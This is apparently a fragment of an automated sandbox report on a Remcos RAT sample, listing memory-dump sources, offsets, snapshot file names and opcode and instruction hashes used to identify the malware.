                            Memory Dump Source
                            • Source File: 00000003.00000002.1400191414.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_f60000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 49f27e6b9187ea9e76644e7cced3de6dd73a9f49e2f84acabc43932b757492a3
                            • Instruction ID: e0219fce664fa487b477d7b1f89acdc693e0be2b15b7218eab59260f7c21148c
                            • Opcode Fuzzy Hash: 49f27e6b9187ea9e76644e7cced3de6dd73a9f49e2f84acabc43932b757492a3
                            • Instruction Fuzzy Hash: 6441B074E01228CFDB64DF64C895BAEBBB2BB46300F2044A9D919B7352DB355E81DF11
                            Memory Dump Source
                            • Source File: 00000003.00000002.1399771670.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_e7d000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3aad19eb304d79420c73b4df981a7137f35d26779cd9d5f9f686e9f46a0a26a4
                            • Instruction ID: 741be0a7e07c91c52a2622140cab5de1fd5c4ed92ac9ef8f06ffb38d531a04bf
                            • Opcode Fuzzy Hash: 3aad19eb304d79420c73b4df981a7137f35d26779cd9d5f9f686e9f46a0a26a4
                            • Instruction Fuzzy Hash: 6821FF72508200EFCB15DF14D9C0B26BF75FF98324F20C569E90D1A246D336E856CAA2
                            Memory Dump Source
                            • Source File: 00000003.00000002.1399771670.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_e7d000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e58b8c56749219af83652b03aa806fca99c49847d28242aa59a8ed161806656
                            • Instruction ID: 4ba0f3287b4612cd587bc3dc2f9b064562401fa1ca84c116ab8db8435b7eeea9
                            • Opcode Fuzzy Hash: 3e58b8c56749219af83652b03aa806fca99c49847d28242aa59a8ed161806656
                            • Instruction Fuzzy Hash: 0C11D376508240DFCB15CF10D9C4B16BF72FF94324F24C5A9D8095B656D336E856CBA1